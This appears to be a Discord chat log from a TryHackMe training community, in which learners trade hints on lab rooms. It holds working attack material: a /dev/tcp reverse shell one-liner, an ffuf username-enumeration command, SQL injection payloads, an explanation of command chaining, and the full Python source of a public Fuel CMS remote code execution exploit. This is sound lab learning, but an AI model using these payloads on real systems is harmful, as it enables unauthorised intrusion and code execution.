the point is u put ur ip address and it ping it, means it automatically ping (ur input), and if u put & that means it executes ur other command too

#

like ls & pwd

modest arch
#

gotcha

deft valley
modest arch
#

did

deft valley
modest arch
next lanceBOT
#

Gave +1 Rep to @deft valley

deft valley
#

welcome!

modest arch
#

i miss tokyo from money heist

gray bolt
modest arch
#

is the tryhackme bot down?

gray bolt
#

I tried numbers from 1-1000

modest arch
unreal folio
#

Anyone also get error 405 specified method is invalid for the Playground RFI challenge?

gray bolt
#

Can I pm you?

unreal folio
#

Yes pls

#

Oh nvm haha

modest arch
#

lol

#

can I too?

unreal folio
#

Ty!

remote estuary
#

i restart the VM, it's work now

undone mirage
#

anybody else finish a room and when you click on a ticket, it just blanks and says "tickets for this room already claimed"?

modest arch
#

maybe you clicked too hastily

deft valley
prime sundial
unreal folio
#

I pretty much followed the RFI example, but using gethostname() for Playground. I'm getting a 405 Error Method Not Allowed. Can someone share a hint, or what I'm doing wrong pls ๐Ÿค”

jade lodge
#

how long is the hydra attack for eddie/quinn supposed to take in the netsecchallenge room?

modest arch
#

stuck on level 4 : )

jade lodge
#

spoiler

modest arch
#

yes?

lusty bolt
#

bruh

opal stirrup
#

It's pretty much the same as the previous level, you're just validating inputs differently

modest arch
#

o my bad

jade lodge
#

thanks. i ran 2 tasks and they both have been running 20mins. tried a few other short seclist files, but didn't help

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

Has anyone gotten flag1 of the Capstone challenge in the Linux PrivEsc room? I have ran many exploits and none have worked. I am able to read files (I have one read exploit working) and have tried to crack hashes to be able to su to a user but still nothing(couldn't crack the hashes).

jade lodge
#

thanks again. i got it working. command looked right, but somehow it attacked IP/PORT instead of IP:PORT

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

I was able to get the root file from another exploit ๐Ÿ‘€ . However, I have tried different privesc methods to get missy.

#

That is the method I got the root one from. i'll take a look and see if there is another one I can manipulate to get to her account

#

No. I was able to use that particular exploit method to get sudo reads on files. So, I was able to guess the path to the flag and extract what was contained. Not logged into root

#

Can I quickly DM. I'm trying to not give much away here

pearl compass
#

This is the command i use

#

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "admin=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"

#

@modest arch

modest arch
#

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"

modest arch
quick light
#

help needed in net sec challenge ftp

#

and also the last challenge

pearl compass
#

do I need to be in a certain directory for it to work? @modest arch

quick light
#

tried many scans but haven't yet found the ftp port

#

also didn't understand that last challenge

#

I tried to but it was taking A LOT of time

#

I'll try again

#

what exactly is supposed to happen in this one?

#

let's say I'm able to do that
what then?
does the page just gives me the flag?

#

okay

modest arch
pearl compass
#

thank you, much appreciated @modest arch

next lanceBOT
#

Gave +1 Rep to @smoky oyster

modest arch
#

oh not again

#

anyone help me with this please I wanna sleep๐Ÿ˜ญ

lusty bolt
#

You don't have to complete it

modest arch
#

and this is the only question m left with in this room

lusty bolt
#

Go sleep

modest arch
#

i won't be able to

#

so help me ?๐Ÿฅบ

#

m not getting any relevant things to get the flag

#

yeah and then they give an input which I used as you can clearly see in the screenshot

subtle heron
remote estuary
#

i need help with netsec challenge, IDS evasion

#

task 2

#

i have 50%

#

yep

#

||nmap -sS -F --reason MACHINE_IP||

#

try -sW, -sX, -sM, -f and --mut 8 but not working

deft valley
sharp oar
#

can I dm @steel nymph ? Stuck on task 8 SQLi

eager cave
#

Hey guys. Task 5 windows privesc, sc start dllsvc does not start it. What am I missing

north dove
#

hey there

steep bolt
#

guys, with each room I have info "Tickets for this room already awarded."

#

what to do?

#

how do I get back previous tickets?

north dove
#

Privesc Task 9 crontab. Unable to get revshell ๐Ÿ˜ฆ this sucks

deft valley
drifting drum
steep bolt
#

File Inclusion, IDOR and Auth bypass

north dove
quick light
#

@steel nymph in the last challenge it's showing me 22%
what to do now?

drifting drum
north dove
#

i'm sorry if i didn't see. I'm having a really bad connection rn

north dove
#

wait sending

drifting drum
#

Ok

eager cave
#

It gives start pending on SC start and never actually starts

drifting drum
north dove
remote estuary
#

@steel nymph can i dm you?

drifting drum
north dove
#

for ex : sh -i >& /dev/tcp/10.2.97.169/4444 0>&1

drifting drum
#

Send me a screenshot of whatever you ha e in there now

north dove
north dove
#

oh

#

okay

#

yeah did

#

hope it works

eager cave
north dove
#

damn! i got the root shell!

#

So what's the moral?

eager cave
#

Actually the command ran. I logged as jack but service still pending

north dove
#

yeah! what should someone learn from this room. I mean its not usual to not get the revshell

#

yeah! this is a lesson for me

#

haha

copper belfry
#

Hey having trouble with manual discovery - robots.txt, going to the ip/robots.txt doesn't take me anywhere, just site can't be reached.

#

Attackbox, got it now. Had to restart attackbox

wanton prism
#

SQL inection task 8, going to lose my mind, this is my syntax, what am i doing wrong https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.columns WHERE table_schema = 'sqli_four' and table_name = 'users' and column_name like '%';--

north dove
#

@modest arch the next qn asks for Matt's passwd. What wordlist should i use to crack the hash?

#

rockyou isn't working

#

yeah i did

#

now i unshadowed

#

what's next

#

which wordlist to use?

north dove
#

umm okay! lemme try again

wanton prism
north dove
#

yes it worked

deft valley
north dove
#

lol i was giving the wrong directory

wanton prism
deft valley
north dove
#

damn! hahaha ! i need to make a revision lol

wanton prism
deft valley
wanton prism
#

ok i have that, now what should i do next

deft valley
#

now find other columns

thick valley
#

Task 8: https://tryhackme.com/room/xssgi

nc not catching anything.
The listener THM offered only caught a DNS request and nothing else.

Filtering through other people's posts, this doesn't seem to be resolved yet

opal stirrup
deft valley
thick valley
next lanceBOT
#

Gave +1 Rep to @opal stirrup

tawny flame
#

On Task 7 on passive Recon, you're supposed to lookup the 3rd most common port used for ngnix, but when I enter the port number.. I get wrong answer

wanton prism
#

I think im getting it now, Thank you!

next lanceBOT
#

Gave +1 Rep to @tulip elm

tawny flame
#

From 10 to 100? ๐Ÿ™‚

thick valley
tawny flame
#

Could be

#

task 6, sorry

#

nevermind, you were right @steel nymph

thick valley
tawny flame
#

The right answer.

thick valley
wanton prism
thick valley
deft valley
tawny flame
#

If I could spell properly! I'm stpud ๐Ÿ˜„

#

not ngNix but ngINx..

#

thanks @thick valley

next lanceBOT
#

Gave +1 Rep to @thick valley

thick valley
#

oh man I didn't even catch that but that's just unlucky

modest arch
#

Hello, im stuck on vulnerability capstone, trying to get the flag but can get a reverse shell, im using the cve-2018-16763 but the shell isnt stable, im quite new to setting up a stable shell and cant find anything that can work

#

In Traceroute A, what is the IP address of the last router/hop before reaching tryhackme.com? (I entered correct answer but still it is not taking). can anyone help in this. Room Name - Active Reconnaissance

modest arch
#

I entered this IP 100.92.9.83 . But still it is not accepting

deft valley
#

its pretty obvious, come on, i jsut did it

jaunty trail
#

could anyone give me a hint for File Inclusion Task 4, Question 2? "
In Lab #2, what is the directory specified in the include function?" I can see people have said to look at the error message but I'm not sure where to see the error messages?

visual crest
#

try to generate an error message

jaunty trail
#

yes I have been, I just keep coming to the firefox "Unable to connect" page instead of an error that seems related to the task

#

not sure if im just totally missing something

visual crest
#

hmm you are

upper field
#

jesus that sql room

#

i thought this was for juniors lol

deft valley
visual crest
#

yeah screenshot will help, are you using attackbox or vpn?

upper field
#

anyone redeemed the Hak5 pineapple yet ?

visual crest
#

looks like no one has redeemed anything yet

upper field
#

oh how can you tell ?

visual crest
#

go to the page thats in announcements

upper field
#

ohhhh yeah it says 0 claimed!

#

thanks @visual crest

next lanceBOT
#

Gave +1 Rep to @visual crest

twilit flint
#

Counter seems to be broken

upper field
#

wow i am surprised though!

#

oh wow 1 away from everything!

twilit flint
#

i've got bad luck ๐Ÿ˜„ just finished all rooms, no more tickets for me

visual crest
next lanceBOT
#

Gave +1 Rep to @deft valley

jaunty trail
#

@deft valley @visual crest i think it was an issue with my machine, i restarted it and im seeing the error messages now. thanks for the help tho!

#

@visual crest thanks

twilit flint
#

loved the content, priv esc and sqli was awesome

jaunty trail
#

aw it wont let me

deft valley
#

@visual crest thanks

next lanceBOT
#

Gave +1 Rep to @visual crest

deft valley
#

i got u

jaunty trail
#

thank you lol

upper field
#

sqli nearly snapped my laptop in half ๐Ÿ˜„

twilit flint
#

xD yeah

modest arch
#

I'm wondering has anyone done this with out the attackbox, using their own vm? if so how, without giving too much away

visual crest
#

yes, I did it on my own box, you need to be connected to VPN

modest arch
#

I was but the RCE that i could find didn't work, i could find a good way to fix it and couldn't upload anything

visual crest
#

did you look at the RCE? it has a requirement there for something to be running

#

also you have to make sure you modify for your system

modest arch
#

yes, but no stable shell and I couldn't get it to become one(Im not great with getting a stable shell, i tried to look it up and it didn't work) and tried my best to modify the code to come back to my vm

visual crest
#

so how about in your own words, just to validate, what did you do to the exploit or do because of the exploit?

#

and you an spoiler as well ๐Ÿ™‚

modest arch
visual crest
#

oh and thats a good question, where did you get the exploit from?

royal mulch
#

can someone help on sql injection Task-8. "where database() like 'u%'" is not running as expected...

modest arch
#

||# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)

Date: 2019-07-19

Exploit Author: 0xd0ff9

Vendor Homepage: https://www.getfuelcms.com/

Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1

Version: <= 1.4.1

Tested on: Ubuntu - Apache2 - php5

CVE : CVE-2018-16763

import requests
import urllib

url = "http://VUL_MACHINE_IP/"
def find_nth_overlapping(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
return start

while 1:
xxxx = raw_input('cmd:')
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
proxy = {"http":"http://ACK_MACHINE_IP:8080"}
r = requests.get(burp0_url, proxies=proxy)

html = "<!DOCTYPE html>"
htmlcharset = r.text.find(html)

begin = r.text[0:20]
dup = find_nth_overlapping(r.text,begin,2)

print (r.text[0:dup])    ||
modest arch
visual crest
#

ok so you have the right exploit and right ip

deft valley
modest arch
#

That one didn't work for me

visual crest
#

do you have the pre-req for the exploit?

#

that one worked for me

modest arch
next lanceBOT
#

Gave +1 Rep to @dull turtle

visual crest
#

can I DM you?

#

actually...

modest arch
#

sure

visual crest
#

||Do you also have burp suite running?||

modest arch
#

||no, sometimes it prevents my firefox from running properly, i know how to fix it but i have to restart my vm||

visual crest
#

yeah you need that in order for that exploit to run

royal mulch
modest arch